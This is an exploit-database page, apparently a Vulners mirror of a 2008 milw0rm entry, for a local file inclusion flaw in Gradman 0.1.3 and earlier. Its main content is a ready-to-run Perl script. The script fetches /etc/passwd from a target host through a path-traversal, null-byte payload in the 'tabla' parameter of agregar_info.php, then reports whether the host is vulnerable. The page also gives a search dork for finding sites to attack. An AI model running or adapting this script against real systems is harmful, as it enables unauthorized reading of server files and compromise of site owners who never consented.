Lucene search
K

Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 13 Views

Gradman 0.1.3 Local File Inclusion Exploi

Code

                                                --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+     Gradman &#60;= 0.1.3  (agregar_info.php?tabla=) Local File Inclusion Exploit       +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Gradman &#60;= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: &#34;powered by Gradman&#34;
[~] Dork2: Priv8, xD!


[+] Exploit:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print &#34;\t\t########################################################\n\n&#34;;
print &#34;\t\t#    Gradman &#60;= 0.1.3 - Local File Inclusion Exploit   #\n\n&#34;;
print &#34;\t\t#                        by JosS                       #\n\n&#34;;
print &#34;\t\t########################################################\n\n&#34;;


if (!$ARGV[0])
{
print &#34;Usage: perl xpl.pl [HOST]\n&#34;;
print &#34;Example: perl xpl.pl http://localhost/gradman/\n&#34;;
}

else
{

$web=$ARGV[0];
chomp $web;

$iny=&#34;agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00&#34;;

my $web1=$web.$iny;
print &#34;$web1\n\n&#34;;
my $ua = LWP::UserAgent-&#62;new;
my $req=HTTP::Request-&#62;new(GET=&#62;$web1);
$doc = $ua-&#62;request($req)-&#62;as_string;

if ($doc=~ /^root/moxis ){
print &#34;Web is vuln\n&#34;;
}
else
{
print &#34;Web is not vuln\n&#34;;
}

}


--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# milw0rm.com [2008-01-16]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
13